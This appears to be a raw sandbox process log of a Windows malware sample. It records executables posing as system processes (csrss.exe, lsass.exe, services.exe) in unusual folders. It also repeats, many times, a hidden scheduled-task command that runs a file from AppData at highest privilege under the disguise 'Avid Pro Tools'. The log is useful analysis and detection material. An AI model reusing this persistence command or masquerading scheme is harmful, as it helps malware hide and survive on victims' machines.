SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\Prefetch\ReadyBoot\explorer.exe
C:\Windows\Prefetch\ReadyBoot\explorer.exe
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe
"C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe"
C:\winNet\lsm.exe
C:\winNet\lsm.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\lsm.exe.exe
"C:\winNet\lsm.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Admin\WmiPrvSE.exe
C:\Users\Admin\WmiPrvSE.exe
C:\winNet\lsass.exe
C:\winNet\lsass.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\lsass.exe.exe
"C:\winNet\lsass.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Default User\dllhost.exe
"C:\Users\Default User\dllhost.exe"
C:\Users\Admin\AppData\Local\csrss.exe
C:\Users\Admin\AppData\Local\csrss.exe
C:\DriversavessessionDlldhcp\dwm.exe
C:\DriversavessessionDlldhcp\dwm.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe"
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\DriversavessessionDlldhcp\dwm.exe.exe
"C:\DriversavessessionDlldhcp\dwm.exe.exe"
C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\spoolsv.exe
C:\winNet\spoolsv.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe
"C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe"
C:\DriversavessessionDlldhcp\Roblox.exe
C:\DriversavessessionDlldhcp\Roblox.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
